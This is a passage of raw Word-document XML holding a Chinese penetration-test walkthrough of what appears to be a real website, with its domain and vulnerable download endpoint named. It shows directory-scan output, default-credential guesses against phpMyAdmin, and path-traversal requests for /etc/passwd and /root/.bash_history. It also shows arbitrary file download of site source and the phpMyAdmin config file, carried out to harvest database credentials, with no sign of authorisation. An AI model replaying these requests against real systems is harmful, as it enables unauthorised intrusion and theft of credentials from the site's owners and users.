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6222F8" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E46EDD" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:t>漏洞挖掘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E0E58" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:t>获取shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF91BC3" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:t>phpadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AAE0DA" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:t>文件上传与文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3781034E" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46"/>
    <w:p w14:paraId="6B68A7C4" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>对某一个网站的渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F901A4" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C0B8BB" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>简单的进行一下信息收集，goby工具走一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437BDB10" w14:textId="2B48F17E" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D8C21E" wp14:editId="4249FBAD">
            <wp:extent cx="5274310" cy="1324610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="280415772" name="图片 2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8FDBD8" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F19795" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>[200][text/html][1.67kb] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/24</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][0b] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/adm/</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][0b] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/adm/index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][application/xml][341.00b] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][2.71kb] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/help/</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/plain][3.56kb] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/index.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][132.00b] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/manage/</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][127.00b] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/manager/</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][8.21kb] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/manual/index.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html; charset=utf-8][8.48kb] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/phpMyAdmin/</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][application/xml][0b] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/rss</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][780.00b] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/root/</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>[200][text/html][21.69kb] http:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//www.xxxxxx/temp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50E5C0" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>直接访问phpMyAdmin，随便输入密码，admin/admin，页面响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AEC0D" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#1045 - Access denied for user 'admin'@'localhost' (using password: YES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E832B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>虽然密码不对，但是允许远程连接没下来的思路就是想办法拿到账号密码，这里可以尝试爆破、获取后台数据库配置文件等等拿到密码，先放这里继续往下看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4AD74C" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞挖掘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B324DCF" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>80端口是个web服务，访问一下大体浏览一下，有一个文件下载页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DFD7D0" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>http://www.xxxxx/include/download.php?f=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6729B0" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>这个页面就比较奇怪，不输入任何字符直接下载了download.php文件，查看文件是乱码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7510D" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:t>  ~ cat /Users/apple/Downloads/download.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>    ..</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>        App</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#$</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ndata</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>050.phphp.swp</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.index.php.swx</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>                                                        HXZfunn</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="等线" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD5357" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:lastRenderedPageBreak/>
        <w:t>更换编码怎么都不行，后来问一下其他前辈，使用strings命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62EE91" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>➜</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:t>  Downloads strings /Users/apple/Downloads/download.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home1</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home10</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home11</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home12</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home13</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home2</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home3</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home3_test01</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home4</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home5</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home8</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>home9</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>include</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>leo-pack</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>manage</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>managen</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>managern</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>micah</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>new-function</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>nutrition</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>p_card</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>phpMyAdmin/config.inc.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>schoolmana</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>student</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>talk</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>teacher</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>temp2</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>xlib</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>!.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>24.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>3_8.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>3_9.gif</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>Zindex.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>building.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:lastRenderedPageBreak/>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>down_class.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>down_class.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>index-old.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>index.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>lurker-old.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>lurker.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>lurker.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>rss.bak</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>lurker_20100818.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>phpinformation.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>rss.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>systest.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>.index.php.swp</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>.index.php.swx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A673931" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>一堆文件，和目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A0B34" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>接着尝试一下linux比较敏感的文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CB437" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>/root/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A7227" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>发现在使用目录跳转的时候，页面空白。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A29A6" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>f=../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C72F0" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>如果直接使用文件路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF22C6B" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>f=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9EC66E" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>会直接下载文件而且文件空白，随便输入文件名也会下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F67B0" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>f=qqq</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
        <w:t>f=aaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9C359" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>紧接着尝试其他敏感文件，apache配置等等，本想着burp爆破一下还是算了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B80334" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>接着尝试一下网站上能够显示出来的文件，直接输入文件全路径试试，可以在url中判断具体路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F9B83" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>网站文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDDBE37" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>http://www.root.org.tw/home12/9847/service.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D724B7" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>home12，这个东西在上文见过，就是网站根目录的一个目录，实锤了绝对路径就是home12/9847/service.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A84724" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>存在漏洞文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BDEE92" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>http://www.root.org.tw/include/download.php?f=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48761D3F" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>直接下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CDB4A" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>http://www.root.org.tw/include/download.php?f=/home12/9847/service.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85AB2D" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>文件中找到一些inc文件以及一个登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C04E2F3" w14:textId="510CFE58" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="049BC900" wp14:editId="1124EFB7">
            <wp:extent cx="5274310" cy="2477135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="890911412" name="图片 1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8332A9" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:t>上文我们发现存在一个phpadmin目录，想一下phpadmin的常见配置文件，尝试下载，/phpMyAdmin/config.inc.php。找到了一个被注释的账号密码，尝试了一下也不太好使。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B4194" w14:textId="77777777" w:rsidR="00711A46" w:rsidRPr="00711A46" w:rsidRDefault="00711A46" w:rsidP="00711A46">
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/* User for advanced features */</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// $cfg['Servers'][$i]['controluser'] = 'pma';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00711A46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// $cfg['Servers'][$i]['controlpass'] = 'pmapass';</w:t>
      </w:r>
      <w:r w:rsidRPr="00711A46">
